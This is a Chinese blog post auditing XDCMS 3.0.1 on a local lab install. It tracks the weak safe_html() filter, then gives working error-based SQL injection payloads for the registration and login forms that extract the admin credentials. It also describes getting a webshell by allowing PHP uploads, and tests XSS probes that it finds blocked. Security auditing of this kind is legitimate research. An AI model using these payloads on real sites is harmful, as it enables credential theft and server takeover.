这周的审计任务,这次审计 xdcms 。
下面就开始审计之旅。
环境搭建
审计CMS,首先环境搭建。
1,虚拟机/本机win7 32/64位,用wamserver或者phpstudy搭建环境。
2,xdcms_3.0.1 源码(已分享链接)放到WWW目录下面
3,安装,访问( 127.0.0.1/xdcms_3.0.1_utf8/xdcms_3.0.1_utf8/install )。一路选择下一步,直到设置页面,创建数据库......安装完成。
点击同意,开始安装。
输入数据库账号密码(可以选择新建个数据库 xdcms ,不新建也可以,输入数据库的名称即可),点击进行下一步进行网站简单的设置
可以看到安装成功,请牢记您的管理员账户:xdcms , 密码 xdcms,进入后台管理。
代码审计
首先可以拿出来 代码审计工具--Seay源代码审计系统进行自动审计,先看一下哪里容易出问题,从而可以不那么盲目。
发现 xdcms 的目录很简单,包括后台 admin ,cache , data , 系统system ,上传uploadfile。
自动扫描出了171个可疑漏洞。
SQL注入漏洞
现在先熟悉一下流程,可以看到能够进行注册登录。
那就注册一个账号orange,密码orange。
上面看到密码是进行了两次md5加密,接下来看 一下代码
/system/modules/member/index.php
上面的代码很容易读懂,函数是register_save(),注册保存。首先POST接收传过来的参数,判断是不是为空。
66行密码进行两次md5加密,可以看到并没有进行明显的过滤,但是在50行和72行看到了过滤函数safe_html(),下面就开始追踪一下这个函数,
function safe_html($str){ if(empty($str)){return;} $str=preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|=|/*|*|../|./| union | from | where | group | into |load_file |outfile/','',$str); return htmlspecialchars($str); }
分析一下这个过滤函数,只是简单的把上面看到的 select ,insert,update 等等替换成了空 。
在 safe_html 处虽然过了个SQL注入的敏感词,还过滤了=和*,但是没有考虑SQL注入敏感词的大小写,这里只过滤了小写,那么我们用大写绕过,这里过滤的=和*,我们可以使用不带*和=的常规保存SQL注入语句
这里利用报错注入来进行测试,bestorange' or updatexml(1,concat(0x7e,(selEct concat(username,0x23,password) frOm c_admin),0x7e),1) #&password=bestorange
payload:username=bestorange' or updatexml(1,concat(0x7e,(selEct concat(username,0x23,password) frOm c_admin),0x7e),1) #&password=bestorange&password2=bestorange&fields%5Btruename%5D=bestorange&fields%5Bemail%5D=bestorange&submit=+%E6%B3%A8+%E5%86%8C+
可以看到上面注入出来了管理员的账号密码,然后就可以进行登录。
因为这个CMS过滤的时候基本上是用到的是 safe_html() 函数,所以这个CMS的其他地方注入的利用方式都是一样的,利用方法像上面一样,问题都是出在 safe_html() 函数。
再看下登录处的SQL注入
路径:/system/modules/member/index.php
95行--127行
上面的程序也不是很难读,可以看到POST接收过来登录的账号密码,然后通过 safe_html() 函数 进行过滤,判断是否为空,进而在103行直接带入数据库查询。
这里仅仅通过 safe_html() 函数进行了过滤,所以很显然是存在注入的。
payload:username=bestorange'or updatexml(1,concat(0x7e,(selEct concat(username,0x23,password) frOm c_admin),0x7e),1) #&password=bestorange&submit=+%E7%99%BB+%E5%BD%95+
getshell
通过上面注入得到的管理员的账号密码登录后台,成功进入后台管理系统,在 系统设置-->网站配置-->上传设置-->文件/图片上传格式限制。
添加php文件类型,然后进行上传即可。
XSS漏洞?
这里看一下xss漏洞,链接(http://127.0.0.1/index.php?m=form&c=lists&formid=7)(http://127.0.0.1/index.php?m=form&c=lists&formid=8)
这里是可以进行留言的,常规老套路,首先进行黑盒测试,输入:"><script>alert(a)</script><",可以看到是没有任何反应的,接下来去数据库看一下,表-->c_message,看到都被转义了
同样,上传简历的地方也是被转义了,简历的表-->c_resume,现在这里是找不出xss漏洞的,直接去分析下代码。
/system/modules/form/lists.php
留言的模块,就不详细解释了,直接看73--83即可。
输入的值遍历输出,重点在82.83行,看到了过滤函数:safe_replace(safe_html($value)),safe_html()这个函数上面讲过,追踪safe_replace()函数,
/system/function/fun.inc.php
33--46行可以看到,过滤和转义了%20,%27,%2527,*,",',;,<,>,{,},\。
可以看到过滤以及转义的全面,基本上构造不出来这样的payload,因此我个人认为这里的xss漏洞是不存在的,如果你有好的payload,欢迎交流。
再看一下会员中心存在xss漏洞吗?
注册个账号orange用户,进行登录。
-->修改会员资料<--
输入:"/><script>alert("orange")</script><",是没有任何反应的,这个时候查看一下源代码。可以看到是被转义了。因为整个cms调用的是safe_replace()函数,因此这个xdcms是不存在xss漏洞的。
源码链接(链接: https://pan.baidu.com/s/1pKApFWv 密码: vx74)
本文链接(http://www.cnblogs.com/Oran9e/p/7944859.html),转载请注明。
任重而道远!